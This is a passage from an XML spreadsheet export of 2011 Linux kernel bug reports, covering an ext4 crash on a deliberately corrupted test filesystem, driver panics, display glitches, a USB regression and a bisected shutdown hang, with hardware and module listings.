Family) PCI Express Root Port 6 00:1d.0 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #1 00:1d.1 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #2 00:1d.2 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #3 00:1d.7 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #1 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 90) 00:1f.0 ISA bridge: Intel Corporation 82801JIR (ICH10R) LPC Interface Controller 00:1f.2 SATA controller: Intel Corporation 82801JI (ICH10 Family) SATA AHCI Controller 00:1f.3 SMBus: Intel Corporation 82801JI (ICH10 Family) SMBus Controller 01:00.0 VGA compatible controller: nVidia Corporation NV44 [GeForce 6200 TurboCache(TM)] (rev a1) 03:00.0 SATA controller: JMicron Technology Corp. JMB362/JMB363 Serial ATA Controller (rev 02) 03:00.1 IDE interface: JMicron Technology Corp. JMB362/JMB363 Serial ATA Controller (rev 02) 04:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 02) 05:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 02) 06:07.0 FireWire (IEEE 1394): Texas Instruments TSB43AB23 IEEE-1394a-2000 Controller (PHY/Link) lsmod: Module Size Used by nls_iso8859_1 4245 0 nls_cp850 4993 0 vfat 8276 0 fat 40966 1 vfat usb_storage 38956 0 oss_usb 117863 0 oss_hdaudio 144007 0 osscore 538035 2 oss_usb,oss_hdaudio it87 22764 0 coretemp 4666 0 adt7475 16227 0 hwmon_vid 1692 2 it87,adt7475 hwmon 1297 3 it87,coretemp,adt7475 fuse 55326 3 hid_logitech 6291 0 usbhid 20749 0 hid 40047 2 hid_logitech,usbhid raid456 43549 1 async_pq 2268 1 raid456 async_xor 1433 2 raid456,async_pq xor 4385 1 async_xor async_memcpy 982 1 raid456 async_raid6_recov 1249 1 raid456 raid6_pq 77146 2 async_pq,async_raid6_recov async_tx 1161 5 raid456,async_pq,async_xor,async_memcpy,async_raid6_recov raid1 17643 1 md_mod 78992 6 raid456,raid1 nouveau 555242 2 fbcon 34504 76 font 7228 1 fbcon bitblit 4066 1 fbcon ttm 44101 1 nouveau softcursor 1093 1 bitblit drm_kms_helper 21366 1 nouveau,[permanent] drm 145307 4 nouveau,ttm,drm_kms_helper agpgart 22857 2 ttm,drm uhci_hcd 17968 0 fb 44606 5 nouveau,fbcon,bitblit,softcursor,drm_kms_helper i2c_i801 6484 0 fbdev 673 1 fb i2c_algo_bit 4232 1 nouveau ehci_hcd 31172 0 i2c_core 15315 6 adt7475,nouveau,drm_kms_helper,drm,i2c_i801,i2c_algo_bit cfbcopyarea 2865 1 nouveau r8169 31361 0 mii 3154 1 r8169 video 10647 1 nouveau cfbimgblt 1873 1 nouveau cfbfillrect 2909 1 nouveau usbcore 103513 5 usb_storage,oss_usb,usbhid,uhci_hcd,ehci_hcd uname: Linux 2.6.38-gentoo-delan2 #4 SMP Sun Mar 27 07:51:18 WST 2011 x86_64 Intel(R) Core(TM)2 Quad CPU Q9650 @ 3.00GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>Kernel BUG on accessing intentionally corrupted filesystem</t>
  </si>
  <si>
    <t>2.6.38.2 + patch for #32082</t>
  </si>
  <si>
    <t>2011-03-29 10:48 UTC</t>
  </si>
  <si>
    <t>2012-05-14 14:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 52432 [details] Test ext4 file system (intentionally corrupted) Accessing the attached (intentionally corrupted) ext4 filesystem causes a kernel BUG at fs/ext4/extents.c:1943. The kernel is vanilla 2.6.38.2 with the patch from #32082 comment 1 applied to fix another (most likely entirely distinct) ext4 bug. I run the kernel under KVM x86-64. Steps to reproduce: 1. bunzip2 hdb.337.bz2 2. mount hdb.337 /mnt -t ext4 -o errors=continue 3. cd /mnt 4. cp -R doc doc2 [BUG] Here's the output: ------------------------------------------------------------ fstest:~# mount /dev/vdb /mnt -t ext4 errors=continue [ 84.599961] EXT4-fs (vdb): mounted filesystem with ordered data mode. Opts: errors=continue fstest:~# cd /mnt fstest:/mnt# ls dev doc lost+found fstest:/mnt# cp -R doc doc2 EXT4-fs error (device vdb): ext4_mb_generate_buddy:731: group 06074 blocks in bitmap, 6075 in gd EXT4-fs error (device vdb): ext4_mb_generate_buddy:731: group 11892 blocks in bitmap, 1891 in gd EXT4-fs error (device vdb): ext4_ext_check_inode:428: inode #1334: comm cp: bad header/extent: invalid eh_entries - magic f30a, entries 32769, max 4(4), depth 0(0) cp: cannot stat `doc/acpid/examples': Input/output error ------------[ cut here ]------------ kernel BUG at fs/ext4/extents.c:1943! invalid opcode: 0000 [#1] last sysfs file: CPU 0 Pid: 1851, comm: cp Not tainted 2.6.38.2 #4 Bochs Bochs RIP: 0010:[&lt;ffffffff811f68f1&gt;] [&lt;ffffffff811f68f1&gt;] ext4_ext_put_in_cache+0x71/0x80 RSP: 0000:ffff880004c2f768 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000000087d RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8800050fe3b0 RBP: ffff880004c2f798 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 000000000000087d R12: 0000000000000000 R13: ffff8800050fe3b0 R14: ffff8800050fe260 R15: 000000000000087d FS: 0000000000000000(0000) GS:ffffffff8221e000(0063) knlGS:00000000f7579700 CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b CR2: 00000000ffe67dac CR3: 0000000004c14000 CR4: 00000000000006b0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process cp (pid: 1851, threadinfo ffff880004c2e000, task ffff8800056d8ff0) Stack: ffff8800050fe260 ffff880007aa9ba0 ffff880004c2f9a8 ffff8800050fe3b0 ffff8800050fe260 ffff8800050fe26c ffff880004c2f928 ffffffff811f8983 000000000000020a ffff88000577b6a8 ffff880004c2f838 0000000000000018 Call Trace: [&lt;ffffffff811f8983&gt;] ext4_ext_map_blocks+0x173/0x26e0 [&lt;ffffffff811d9272&gt;] ext4_map_blocks+0x72/0x280 [&lt;ffffffff811d9520&gt;] _ext4_get_block+0xa0/0x150 [&lt;ffffffff811d9611&gt;] ext4_get_block+0x11/0x20 [&lt;ffffffff81126d4a&gt;] do_mpage_readpage+0x43a/0x5b0 [&lt;ffffffff810b3c8a&gt;] ? add_to_page_cache_locked+0xca/0x110 [&lt;ffffffff8112761c&gt;] mpage_readpages+0xfc/0x160 [&lt;ffffffff811d9600&gt;] ? ext4_get_block+0x0/0x20 [&lt;ffffffff811d9600&gt;] ? ext4_get_block+0x0/0x20 [&lt;ffffffff811d4d08&gt;] ext4_readpages+0x18/0x20 [&lt;ffffffff810bdcac&gt;] __do_page_cache_readahead+0x19c/0x280 [&lt;ffffffff810bdbbd&gt;] ? __do_page_cache_readahead+0xad/0x280 [&lt;ffffffff810bdfdc&gt;] ra_submit+0x1c/0x20 [&lt;ffffffff810be0fd&gt;] ondemand_readahead+0x11d/0x2c0 [&lt;ffffffff810be2ce&gt;] page_cache_sync_readahead+0x2e/0x40 [&lt;ffffffff810b55e9&gt;] generic_file_aio_read+0x4c9/0x6f0 [&lt;ffffffff810f1a72&gt;] do_sync_read+0xd2/0x110 [&lt;ffffffff8153a6e3&gt;] ? security_file_permission+0x93/0xb0 [&lt;ffffffff810f2192&gt;] vfs_read+0xc2/0x180 [&lt;ffffffff810f252c&gt;] sys_read+0x4c/0x90 [&lt;ffffffff81033642&gt;] ia32_sysret+0x0/0x5 Code: 89 a5 b4 05 00 00 4d 89 bd a8 05 00 00 4c 89 f7 e8 75 a0 9e 00 48 8b 5d d8 4c 8b 65 e0 4c 8b 6d e8 4c 8b 75 f0 4c 8b 7d f8 c9 c3 &lt;0f&gt; 0b 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 31 c0 48 89 e5 RIP [&lt;ffffffff811f68f1&gt;] ext4_ext_put_in_cache+0x71/0x80 RSP &lt;ffff880004c2f768&gt; ---[ end trace af6e1f4d49d6021f ]--- ------------------------------------------------------------</t>
  </si>
  <si>
    <t>rt73usb making the kernel panic.</t>
  </si>
  <si>
    <t>2.6.37.5-1</t>
  </si>
  <si>
    <t>2011-03-29 11:05 UTC</t>
  </si>
  <si>
    <t>Hellyna Ng</t>
  </si>
  <si>
    <t>2012-04-01 10:23 UTC</t>
  </si>
  <si>
    <t>Stanislaw Gruszka</t>
  </si>
  <si>
    <t>As stated. But the crash doesn't come immediately. I used to blacklist the rt2500lib module which was in conflict with rt73usb in earlier kernel versions... not about now. How do I confirm it's this card? I used another card which runs the ath9k_htc driver and it runs fine for many many hours, but when I insert and use the (TP-LINK TL-WN321G) rt73usb driver it crashes after sometime, like 30mins - 2hrs. The kernel panic message traceback shows rt7x00lib but i have no idea how to capture that output :(. kernel.log{.1} shows nothing too.</t>
  </si>
  <si>
    <t>Possible kernel panic after resume from s2disk</t>
  </si>
  <si>
    <t>2011-03-30 00:03 UTC</t>
  </si>
  <si>
    <t>Donald</t>
  </si>
  <si>
    <t>2011-04-16 20:07 UTC</t>
  </si>
  <si>
    <t>After kernel update suspend to disk works normal, but after resuming system is unresponsive. Resume process shows on a tty, but when it hits 100% and screen clears kernel possibly crashes (cursor stays but not blinks, no any response on SysRq keys) - seems to be kernel panic occured. Kernels prior to 2.6.38.2 works well (current - 2.6.38). Same behavior on latest stable longterm (2.6.32.36). Software packages: suspend-utils 1.0 kernel 2.6.38.2</t>
  </si>
  <si>
    <t>Strange screen in KDE with 2.6.39-rc1 and i915</t>
  </si>
  <si>
    <t>2.6.39-rc1</t>
  </si>
  <si>
    <t>2011-03-30 20:14 UTC</t>
  </si>
  <si>
    <t>2011-04-06 19:43 UTC</t>
  </si>
  <si>
    <t>I am using the i915 driver and I have a very strange screen with KDE under kernel 2.6.39-rc1. The wallpaper is replaced by a black screen, there is no KDE menu bar and the desktop icons don't show up. I am using gentoo and KDE 4.4.5 but the problem also occurs in Debian (also with KDE 4.4.5). Does anybody have an idea about what's happening ?</t>
  </si>
  <si>
    <t>Oops associated with radeon_unpin_work_func</t>
  </si>
  <si>
    <t>2.6.39</t>
  </si>
  <si>
    <t>2011-03-31 23:13 UTC</t>
  </si>
  <si>
    <t>Stuart Foster</t>
  </si>
  <si>
    <t>2011-07-10 23:13 UTC</t>
  </si>
  <si>
    <t>29942 33222 38232</t>
  </si>
  <si>
    <t>If this system (LFS build) is left idle for several hours with xscreensaver running(don't currently know which screen saver app. I am assuming one of the Mesa 3D ones) the system will oops. The system is locked solid and there is no trace in messages.old on reboot. The attached jpg is a photo of the screen at system failure. I first noticed the problem in 2.6.38-rc8 but have waited until now to report the problem in the hope of obtaining a more repeatable scenario. Version info: Xorg server 1.10.0 Xorg ati driver 6.14.1 libdrm-2.4.24 Mesa-7.10.1 Processor AMD Phenom(tm) II X4 940 Processor Linux Andromeda 2.6.38.2 #1 SMP Mon Mar 28 22:17:13 BST 2011 i686 athlon-4 i386 GNU/Linux Gnu C 4.6.0 Gnu make 3.81 binutils 2.21 util-linux 2.14.1 mount support module-init-tools 3.5 e2fsprogs 1.41.4 Linux C Library 2.13 Dynamic linker (ldd) 2.13 Linux C++ Library 6.0.15 Procps 3.2.7 Net-tools 1.60 Kbd 1.15 Sh-utils 7.4 Modules Loaded md4 md5 hmac cryptomgr aead nls_cp437 cifs crypto_hash crypto_algapi microcode nfs fscache nfsd lockd sunrpc exportfs fuse usbhid firewire_ohci sr_mod sg firewire_core cdrom psmouse i2c_piix4 crc_itu_t button vboxnetflt fifo splitter ohci_hcd ehci_hcd usbcore nls_base vboxnetadp snd_hda_codec_hdmi snd_hda_codec_analog snd_hda_intel snd_hda_codec snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss snd_hwdep snd_pcm snd_page_alloc snd_timer snd soundcore brd loop asus_atk0110 powernow_k8 processor thermal_sys mperf pata_atiixp vboxdrv sky2 rtc eeprom unix</t>
  </si>
  <si>
    <t>USB Disconnects / resets after commit b963801164618e25fbdc0cd452ce49c3628b46c8</t>
  </si>
  <si>
    <t>2.6.27 - 2.6.38</t>
  </si>
  <si>
    <t>2011-04-01 12:54 UTC</t>
  </si>
  <si>
    <t>2012-02-23 22:36 UTC</t>
  </si>
  <si>
    <t>After commit b963801164618e25fbdc0cd452ce49c3628b46c8 (USB: ehci-hcd unlink speedups) I have instability with an external USB drive on a Intel Mac Mini. USB device will stop working after some minutes/hours/or a few days. Manually reverting the commit fixes it and the USB device is completely stable. I spent a long time trying to track the bug down, firstly trying every single USB quirk mode and kernel configs, and eventually found reverting this commit fixed it. I am currently running a 2.6.27 kernel with the attached patch. The patch still applies to GIT HEAD as of 01/04/2011 The errors looked like Jun 7 22:56:05 malus kernel: usb 1-1: reset high speed USB device using ehci_hcd and address 2 Jun 7 22:56:16 malus kernel: usb 1-1: reset high speed USB device using ehci_hcd and address 2 Jun 7 22:56:19 malus kernel: usb 1-1: USB disconnect, address 2 Jun 7 22:56:20 malus kernel: sd 4:0:0:0: Device offlined - not ready after error recovery the usb device in question: root@malus:/usr/local/src# cat /proc/scsi/usb-storage/4 Host scsi4: usb-storage Vendor: Super Top Product: USB 2.0 IDE DEVICE Serial Number: ST Killer Protocol: Transparent SCSI Transport: Bulk Quirks: IGNORE_RESIDUE Has a quirk active by default, but as everything was fine prior to the patch and the fact that I am not the only person who has had issues with this commit, I wonder if there is a problem in the code somewhere or something that could be done. Other people with issues pointing to that commit http://lkml.org/lkml/2009/5/22/405 (USB/DVB - Old Technotrend TT-connect S-2400 regression tracked down) http://kerneltrap.com/mailarchive/linux-usb/2008/12/19/4459054/thread 9usb: Fix PS3 EHCI suspend) hardware on machine 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:07.0 Performance counters: Intel Corporation Device 27a3 (rev 03) 00:1c.0 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 2 (rev 02) 00:1d.0 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation N10/ICH 7 Family USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 SATA controller: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA AHCI Controller (rev 02) 00:1f.3 SMBus: Intel Corporation N10/ICH 7 Family SMBus Controller (rev 02) 01:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 22) 02:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 01) 03:03.0 FireWire (IEEE 1394): Agere Systems FW322/323 (rev 61) let me know if I can provide other information. The machine is question is a production machine in a hosting facility, so my priority was to get this working as I have now.</t>
  </si>
  <si>
    <t>IP_PKTINFO cmsg lacks if index</t>
  </si>
  <si>
    <t>2011-04-01 18:59 UTC</t>
  </si>
  <si>
    <t>2011-04-30 19:22 UTC</t>
  </si>
  <si>
    <t>The IP_PKTINFO cmsg is missing the if index, ie. ipi_ifindex == 0 (but the address is non-zero). This causes avahi-daemon to abort.</t>
  </si>
  <si>
    <t>Hang/freeze when shutting down, starting with patch a3c08e5...</t>
  </si>
  <si>
    <t>2011-04-03 10:10 UTC</t>
  </si>
  <si>
    <t>Rune K. Svendsen</t>
  </si>
  <si>
    <t>2011-07-30 04:58 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: Computer hangs/freezes before shutting with the text "* Will now halt" on the screen, starting from patch a3c08e5d80c54e32423efbba113b02942c91f726. [2.] Full description of the problem/report: When I issue the command "shutdown -P now" and wait for the computer to shut down, it goes through all the steps - seemingly - but hangs with the text "* Will now halt" displayed on the screen. There is no response to keyboard events: ctrl+alt+delete, caps lock and num lock keys have no effect. This is a regression that was introduced with the following patch (found using git-bisect): commit a3c08e5d80c54e32423efbba113b02942c91f726 Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Fri Oct 8 20:24:58 2010 +0200 x86: Convert irq_chip access to new functions Before moving the irq chips to the new functions, fixup direct callers. The cpu offline irq fixup code needs to become generic and archs need to honour the "force" flag as an indicator, but that's for later. Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; Reviewed-by: Ingo Molnar &lt;mingo@elte.hu&gt; The bug is not present if running a kernel checked out at 011d578fdadb64bcc1deedbb02216bfee6a9b4dc, which is the patch previous to a3c08e5... [3.] Keywords (i.e., modules, networking, kernel): shutdown, irq, core [4.] Kernel version (from /proc/version): Linux version 2.6.36-rc5-good (root@runescomp) (gcc version 4.4.5 (Ubuntu/Linaro 4.4.4-14ubuntu5) ) #9 SMP Sun Apr 3 11:08:25 CEST 2011 (checked out at 011d578... this is the "good" kernel) [7.1.] Software (add the output of the ver_linux script here) rune@runescomp:~/Programming/linux-git$ sh scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux runescomp 2.6.36-rc5-good #9 SMP Sun Apr 3 11:08:25 CEST 2011 x86_64 GNU/Linux Gnu C 4.4.5 Gnu make 3.81 binutils 2.20.51 util-linux 2.17.2 mount support module-init-tools 3.12 e2fsprogs 1.41.12 pcmciautils 014 Linux C Library 2.12.1 Dynamic linker (ldd) 2.12.1 Procps 3.2.8 Net-tools 1.60 Kbd 1.15 Sh-utils 8.5 wireless-tools 30 Modules Loaded binfmt_misc kvm_intel kvm parport_pc ppdev lp parport snd_hda_codec_atihdmi snd_hda_codec_realtek snd_ice1724 snd_ice17xx_ak4xxx radeon snd_ac97_codec snd_hda_intel snd_seq_midi ac97_bus snd_ak4xxx_adda snd_hda_codec snd_ak4114 snd_pt2258 snd_i2c snd_hwdep snd_ak4113 snd_rawmidi snd_seq_midi_event ttm snd_seq snd_seq_device drm_kms_helper snd_pcm snd_timer snd drm soundcore i2c_algo_bit snd_page_alloc abituguru3 coretemp intel_agp shpchp raid10 raid456 async_pq async_xor xor async_memcpy async_raid6_recov r8169 raid6_pq usbhid async_tx raid1 hid ahci mii raid0 libahci pata_jmicron multipath linear [7.2.] Processor information (from /proc/cpuinfo): rune@runescomp:~/Programming/linux-git$ cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz stepping : 7 cpu MHz : 2004.000 cache size : 6144 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 4 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good aperfmperf pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm dts tpr_shadow vnmi flexpriority bogomips : 5677.95 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: (there are four of these in total, "processor: 0" to "processor: 3" [7.3.] Module information (from /proc/modules): rune@runescomp:~/Programming/linux-git$ cat /proc/modules binfmt_misc 7686 1 - Live 0xffffffffa0082000 kvm_intel 49776 0 - Live 0xffffffffa03d1000 kvm 301013 1 kvm_intel, Live 0xffffffffa0385000 parport_pc 30040 0 - Live 0xffffffffa01a5000 ppdev 6568 0 - Live 0xffffffffa008a000 lp 10169 0 - Live 0xffffffffa0061000 parport 37039 3 parport_pc,ppdev,lp, Live 0xffffffffa01e8000 snd_hda_codec_atihdmi 3079 1 - Live 0xffffffffa0039000 snd_hda_codec_realtek 305256 1 - Live 0xffffffffa0338000 snd_ice1724 126489 2 - Live 0xffffffffa0317000 snd_ice17xx_ak4xxx 3115 1 snd_ice1724, Live 0xffffffffa002b000 radeon 894339 3 - Live 0xffffffffa01f4000 snd_ac97_codec 124748 1 snd_ice1724, Live 0xffffffffa02ed000 snd_hda_intel 25446 2 - Live 0xffffffffa0121000 snd_seq_midi 5900 0 - Live 0xffffffffa00bd000 ac97_bus 1474 1 snd_ac97_codec, Live 0xffffffffa00f4000 snd_ak4xxx_adda 9318 2 snd_ice1724,snd_ice17xx_ak4xxx, Live 0xffffffffa00e3000 snd_hda_codec 101539 3 snd_hda_codec_atihdmi,snd_hda_codec_realtek,snd_hda_intel, Live 0xffffffffa01cd000 snd_ak4114 9284 1 snd_ice1724, Live 0xffffffffa00d6000 snd_pt2258 3607 1 snd_ice1724, Live 0xffffffffa00aa000 snd_i2c 5361 2 snd_ice1724,snd_pt2258, Live 0xffffffffa00a3000 snd_hwdep 6546 1 snd_hda_codec, Live 0xffffffffa0032000 snd_ak4113 8955 1 snd_ice1724, Live 0xffffffffa0071000 snd_rawmidi 21916 2 snd_ice1724,snd_seq_midi, Live 0xffffffffa0119000 snd_seq_midi_event 7291 1 snd_seq_midi, Live 0xffffffffa0003000 ttm 65684 1 radeon, Live 0xffffffffa01ba000 snd_seq 56979 2 snd_seq_midi,snd_seq_midi_event, Live 0xffffffffa0109000 snd_seq_device 6912 3 snd_seq_midi,snd_rawmidi,snd_seq, Live 0xffffffffa001d000 drm_kms_helper 33986 1 radeon, Live 0xffffffffa01af000 snd_pcm 88139 6 snd_ice1724,snd_hda_intel,snd_ac97_codec,snd_hda_codec,snd_ak4114,snd_ak4113, Live 0xffffffffa018d000 snd_timer 23148 2 snd_seq,snd_pcm, Live 0xffffffffa0185000 snd 63128 24 snd_hda_codec_realtek,snd_ice1724,snd_hda_intel,snd_ac97_codec,snd_ak4xxx_adda,snd_ak4114,snd_hda_codec,snd_pt2258,snd_i2c,snd_ak4113,snd_hwdep,snd_rawmidi,snd_seq,snd_seq_device,snd_pcm,snd_timer, Live 0xffffffffa016a000 drm 216819 5 radeon,ttm,drm_kms_helper, Live 0xffffffffa0133000 soundcore 1240 1 snd, Live 0xffffffffa0028000 i2c_algo_bit 5528 1 radeon, Live 0xffffffffa000a000 snd_page_alloc 8716 2 snd_hda_intel,snd_pcm, Live 0xffffffffa0015000 abituguru3 26043 0 - Live 0xffffffffa012a000 coretemp 5716 0 - Live 0xffffffffa0105000 intel_agp 31163 0 - Live 0xffffffffa00f6000 shpchp 28791 0 - Live 0xffffffffa00e7000 raid10 22955 0 - Live 0xffffffffa00db000 raid456 54346 0 - Live 0xffffffffa00c6000 async_pq 3883 1 raid456, Live 0xffffffffa00c0000 async_xor 2870 2 raid456,async_pq, Live 0xffffffffa00ba000 xor 4709 1 async_xor, Live 0xffffffffa00b3000 async_memcpy 1561 1 raid456, Live 0xffffffffa00ad000 async_raid6_recov 1808 1 raid456, Live 0xffffffffa00a7000 r8169 39511 0 - Live 0xffffffffa0076000 raid6_pq 80147 2 async_pq,async_raid6_recov, Live 0xffffffffa008d000 usbhid 40403 0 - Live 0xffffffffa0065000 async_tx 2701 5 raid456,async_pq,async_xor,async_memcpy,async_raid6_recov, Live 0xffffffffa0087000 raid1 23200 1 - Live 0xffffffffa0059000 hid 82757 1 usbhid, Live 0xffffffffa003c000 ahci 21262 0 - Live 0xffffffffa0020000 mii 5261 1 r8169, Live 0xffffffffa0035000 raid0 8426 0 - Live 0xffffffffa002d000 libahci 22524 1 ahci, Live 0xffffffffa000d000 pata_jmicron 2771 0 - Live 0xffffffffa001a000 multipath 7051 0 - Live 0xffffffffa0006000 linear 4022 0 - Live 0xffffffffa0000000 [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) rune@runescomp:~/Programming/linux-git$ cat /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0073 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00e0-00e4 : abituguru3 00f0-00ff : fpu 03c0-03df : vga+ 0400-047f : 0000:00:1f.0 0400-0403 : ACPI PM1a_EVT_BLK 0404-0405 : ACPI PM1a_CNT_BLK 0408-040b : ACPI PM_TMR 0420-042f : ACPI GPE0_BLK 0480-04bf : 0000:00:1f.0 04d0-04d1 : pnp 00:01 0500-051f : 0000:00:1f.3 0880-088f : pnp 00:01 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 a000-afff : PCI Bus 0000:01 ae00-aeff : 0000:01:00.0 b000-bfff : PCI Bus 0000:04 bc00-bcff : 0000:04:01.0 bc00-bcff : r8169 be00-be7f : 0000:04:03.0 be00-be7f : ICE1724 bf00-bf1f : 0000:04:03.0 bf00-bf1f : ICE1724 c000-cfff : PCI Bus 0000:03 cb00-cb0f : 0000:03:00.1 cb00-cb0f : pata_jmicron cc00-cc03 : 0000:03:00.1 cc00-cc03 : pata_jmicron cd00-cd07 : 0000:03:00.1 cd00-cd07 : pata_jmicron ce00-ce03 : 0000:03:00.1 ce00-ce03 : pata_jmicron cf00-cf07 : 0000:03:00.1 cf00-cf07 : pata_jmicron d000-dfff : PCI Bus 0000:02 ed00-ed0f : 0000:00:1f.5 ed00-ed0f : ata_piix ee00-ee0f : 0000:00:1f.5 ee00-ee0f : ata_piix ef00-ef03 : 0000:00:1f.5 ef00-ef03 : ata_piix f000-f007 : 0000:00:1f.5 f000-f007 : ata_piix f100-f103 : 0000:00:1f.5 f100-f103 : ata_piix f200-f207 : 0000:00:1f.5 f200-f207 : ata_piix f400-f40f : 0000:00:1f.2 f400-f40f : ata_piix f500-f50f : 0000:00:1f.2 f500-f50f : ata_piix f600-f603 : 0000:00:1f.2 f600-f603 : ata_piix f700-f707 : 0000:00:1f.2 f700-f707 : ata_piix f800-f803 : 0000:00:1f.2 f800-f803 : ata_piix f900-f907 : 0000:00:1f.2 f900-f907 : ata_piix fa00-fa1f : 0000:00:1d.2 fa00-fa1f : uhci_hcd fb00-fb1f : 0000:00:1d.1 fb00-fb1f : uhci_hcd fc00-fc1f : 0000:00:1d.0 fc00-fc1f : uhci_hcd fd00-fd1f : 0000:00:1a.2 fd00-fd1f : uhci_hcd fe00-fe1f : 0000:00:1a.1 fe00-fe1f : uhci_hcd ff00-ff1f : 0000:00:1a.0 ff00-ff1f : uhci_hcd rune@runescomp:~/Programming/linux-git$ cat /proc/iomem 00000000-0000ffff : reserved 00010000-0009f3ff : System RAM 0009f400-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000c0000-000dffff : PCI Bus 0000:00 000e0000-000effff : pnp 00:0b 000f0000-000fffff : reserved 00100000-7fedffff : System RAM 01000000-0158d007 : Kernel code 0158d008-01b2c20f : Kernel data 01c19000-01dd61df : Kernel bss 7fee0000-7fee2fff : ACPI Non-volatile Storage 7fee3000-7feeffff : ACPI Tables 7fef0000-7fefffff : reserved 7ff00000-febfffff : PCI Bus 0000:00 7ff00000-7fffffff : pnp 00:0b d0000000-dfffffff : PCI Bus 0000:01 d0000000-dfffffff : 0000:01:00.0 e0000000-efffffff : PCI MMCONFIG 0000 [bus 00-ff] e0000000-efffffff : reserved e0000000-efffffff : pnp 00:0a fd800000-fd8fffff : PCI Bus 0000:02 fd900000-fd9fffff : PCI Bus 0000:02 fda00000-fdafffff : PCI Bus 0000:04 fda00000-fda1ffff : 0000:04:01.0 fdb00000-fdbfffff : PCI Bus 0000:04 fdbff000-fdbff0ff : 0000:04:01.0 fdbff000-fdbff0ff : r8169 fdc00000-fdcfffff : PCI Bus 0000:01 fdc00000-fdc1ffff : 0000:01:00.0 fdce0000-fdceffff : 0000:01:00.0 fdcfc000-fdcfffff : 0000:01:00.1 fdcfc000-fdcfffff : ICH HD audio fdd00000-fddfffff : PCI Bus 0000:03 fdd00000-fdd0ffff : 0000:03:00.0 fde00000-fdefffff : PCI Bus 0000:03 fdefe000-fdefffff : 0000:03:00.0 fdefe000-fdefffff : ahci fdff8000-fdffbfff : 0000:00:1b.0 fdff8000-fdffbfff : ICH HD audio fdffd000-fdffd0ff : 0000:00:1f.3 fdffe000-fdffe3ff : 0000:00:1d.7 fdffe000-fdffe3ff : ehci_hcd fdfff000-fdfff3ff : 0000:00:1a.7 fdfff000-fdfff3ff : ehci_hcd fec00000-ffffffff : reserved fec00000-fec003ff : IOAPIC 0 fed14000-fed1dfff : pnp 00:0b fed20000-fed9ffff : pnp 00:0b fee00000-fee00fff : Local APIC fee00000-fee00fff : pnp 00:0b ffb00000-ffb7ffff : pnp 00:0b fff00000-ffffffff : pnp 00:0b [7.5.] PCI information ('lspci -vvv' as root) root@runescomp:~# lspci -vvv 00:00.0 Host bridge: Intel Corporation 82G33/G31/P35/P31 Express DRAM Controller (rev 02) Subsystem: ABIT 